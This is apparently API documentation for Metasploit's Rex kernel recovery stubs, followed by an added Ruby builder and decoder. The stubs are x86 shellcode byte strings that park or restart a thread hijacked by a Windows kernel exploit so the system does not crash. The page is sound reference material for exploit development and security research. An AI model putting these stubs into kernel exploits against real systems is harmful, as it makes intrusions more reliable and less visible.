Module: Rex::Payloads::Win32::Kernel::Recovery
Defined in: lib/rex/payloads/win32/kernel/recovery.rb
Overview
Recovery stubs are responsible for ensuring that the kernel does not crash once a kernel-mode payload has run. After the exploit has succeeded they must 'recover' the hijacked thread, either by consuming it (parking it so it never returns) or by putting it back on its normal execution path. Because the right way to do that depends on which thread and which kernel state the exploit hijacked, recovery stubs are often exploit dependent.
Class Method Summary
- .default(opts = {}) ⇒ Object
  The default recovery method is to spin the thread.
- .idlethread_restart(opts = {}) ⇒ Object
  Restarts the idle thread by jumping back to the entry point of KiIdleLoop.
- .spin(opts = {}) ⇒ Object
  Infinite 'hlt' loop.
Class Method Details
.default(opts = {}) ⇒ Object
The default recovery method is to spin the thread.

```ruby
# File 'lib/rex/payloads/win32/kernel/recovery.rb', line 17
def self.default(opts = {})
  spin(opts)
end
```
.idlethread_restart(opts = {}) ⇒ Object
Restarts the idle thread by jumping back to the entry point of KiIdleLoop. This requires a hard-coded address of KiIdleLoop, which differs between kernel builds; pass it as 'KiIdleLoopAddress' in the options hash. If the option is omitted, the stub silently falls back to the address for a fully patched Windows XP SP2 (0x804dbb27), which is only correct on that build. Before jumping, the stub sets the current IRQL in the KPCR to DISPATCH_LEVEL (2) and loads the KPCR self pointer into ebx, the state KiIdleLoop expects on entry.

```ruby
# File 'lib/rex/payloads/win32/kernel/recovery.rb', line 33
def self.idlethread_restart(opts = {})
  # Default to fully patched XPSP2
  opts['KiIdleLoopAddress'] = 0x804dbb27 if opts['KiIdleLoopAddress'].nil?

  "\x31\xC0" +                                      # xor eax,eax
  "\x64\xC6\x40\x24\x02" +                          # mov byte [fs:eax+0x24],0x2  ; KPCR->Irql = DISPATCH_LEVEL
  "\x8B\x1D\x1C\xF0\xDF\xFF" +                      # mov ebx,[0xffdff01c]        ; ebx = KPCR->SelfPcr
  "\xB8" + [opts['KiIdleLoopAddress']].pack('V') +  # mov eax, KiIdleLoopAddress  ; 0x804dbb27 by default
  "\x6A\x00" +                                      # push byte +0x0
  "\xFF\xE0"                                        # jmp eax
end
```
.spin(opts = {}) ⇒ Object
Infinite 'hlt' loop: the hijacked thread halts, is woken by the next interrupt, and halts again, so it is consumed and never returns to the kernel.

```ruby
# File 'lib/rex/payloads/win32/kernel/recovery.rb', line 24
def self.spin(opts = {})
  "\xf4\xeb\xfd"  # hlt ; jmp short -3 (back onto the hlt)
end
```
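The stubs above are opaque byte strings, and the idle-thread one carries a build-specific address that the library substitutes silently when it is missing. The following is an added example, not code from the Rex library: it rebuilds the same two byte sequences (the builder refuses a missing or non-kernel KiIdleLoopAddress instead of defaulting to the XP SP2 value) and decodes a stub back into mnemonics so an exploit author can confirm which address was actually embedded before sending it. The module name RecoveryStubCheck, the helper names, and the decoder's coverage (only the opcodes these stubs use) are this example's own choices.

```ruby
# Added example (not part of Rex): build and decode Win32 kernel recovery stubs.
module RecoveryStubCheck
  KPCR_SELF_PTR  = 0xffdff01c # x86 KPCR at 0xffdff000; +0x1c is SelfPcr (as in the page's stub)
  DISPATCH_LEVEL = 2          # IRQL KiIdleLoop runs at; stored at KPCR+0x24 (fs:0x24)

  # Same byte sequence as Recovery.idlethread_restart, but an absent or
  # non-kernel address is an error rather than a silent fallback to XP SP2.
  def self.build_idlethread_restart(ki_idle_loop)
    raise ArgumentError, 'KiIdleLoopAddress is required' if ki_idle_loop.nil?
    unless ki_idle_loop.is_a?(Integer) && ki_idle_loop.between?(0x80000000, 0xffffffff)
      raise ArgumentError, format('%p is not a 32-bit kernel-mode address', ki_idle_loop)
    end
    "\x31\xC0".b +                                        # xor eax,eax
      "\x64\xC6\x40\x24".b + [DISPATCH_LEVEL].pack('C') + # mov byte [fs:eax+0x24],0x2
      "\x8B\x1D".b + [KPCR_SELF_PTR].pack('V') +          # mov ebx,[0xffdff01c]
      "\xB8".b + [ki_idle_loop].pack('V') +               # mov eax,KiIdleLoop
      "\x6A\x00".b +                                      # push byte 0
      "\xFF\xE0".b                                        # jmp eax
  end

  # Same bytes as Recovery.spin.
  def self.spin
    "\xF4\xEB\xFD".b # hlt ; jmp short -3 (back onto the hlt)
  end

  # Decodes exactly the opcodes the recovery stubs use. Anything else becomes
  # a "db" line so a corrupted or truncated stub shows up in the listing.
  def self.decode(stub)
    bytes = stub.b.bytes
    out = []
    i = 0
    while i < bytes.size
      rest = bytes.size - i
      b0, b1 = bytes[i], bytes[i + 1]
      if b0 == 0x31 && b1 == 0xC0
        out << 'xor eax,eax'; i += 2
      elsif b0 == 0x64 && rest >= 5 && b1 == 0xC6 && bytes[i + 2] == 0x40
        out << format('mov byte [fs:eax+0x%x],0x%x', bytes[i + 3], bytes[i + 4]); i += 5
      elsif b0 == 0x8B && rest >= 6 && b1 == 0x1D
        out << format('mov ebx,[0x%08x]', le32(bytes, i + 2)); i += 6
      elsif b0 == 0xB8 && rest >= 5
        out << format('mov eax,0x%08x', le32(bytes, i + 1)); i += 5
      elsif b0 == 0x6A && rest >= 2
        out << format('push byte 0x%x', b1); i += 2
      elsif b0 == 0xFF && b1 == 0xE0
        out << 'jmp eax'; i += 2
      elsif b0 == 0xF4
        out << 'hlt'; i += 1
      elsif b0 == 0xEB && rest >= 2
        rel = b1 >= 0x80 ? b1 - 0x100 : b1 # sign-extend rel8
        out << format('jmp short %+d (to offset %d)', rel, i + 2 + rel); i += 2
      else
        out << format('db 0x%02x', b0); i += 1
      end
    end
    out
  end

  # The address an idlethread_restart stub will jump to, or nil when the stub
  # does not end in "mov eax,imm32 ; push 0 ; jmp eax".
  def self.embedded_target(stub)
    listing = decode(stub)
    return nil unless listing.last(3)[1] == 'push byte 0x0' && listing.last == 'jmp eax'
    m = listing[-3] && listing[-3].match(/\Amov eax,0x([0-9a-f]{8})\z/)
    m && m[1].to_i(16)
  end

  def self.le32(bytes, off)
    bytes[off, 4].pack('C*').unpack1('V')
  end
  private_class_method :le32
end

if $PROGRAM_NAME == __FILE__
  stub = RecoveryStubCheck.build_idlethread_restart(0x804dbb27)
  puts RecoveryStubCheck.decode(stub)
  puts format('jumps to 0x%08x', RecoveryStubCheck.embedded_target(stub))
  puts RecoveryStubCheck.decode(RecoveryStubCheck.spin)
end
```

Run it against a stub produced by the real library (Rex::Payloads::Win32::Kernel::Recovery.idlethread_restart('KiIdleLoopAddress' => addr)) and check that embedded_target returns the address you resolved for the target's ntoskrnl build; a listing that still shows 0x804dbb27 on anything other than XP SP2 means the option never reached the stub.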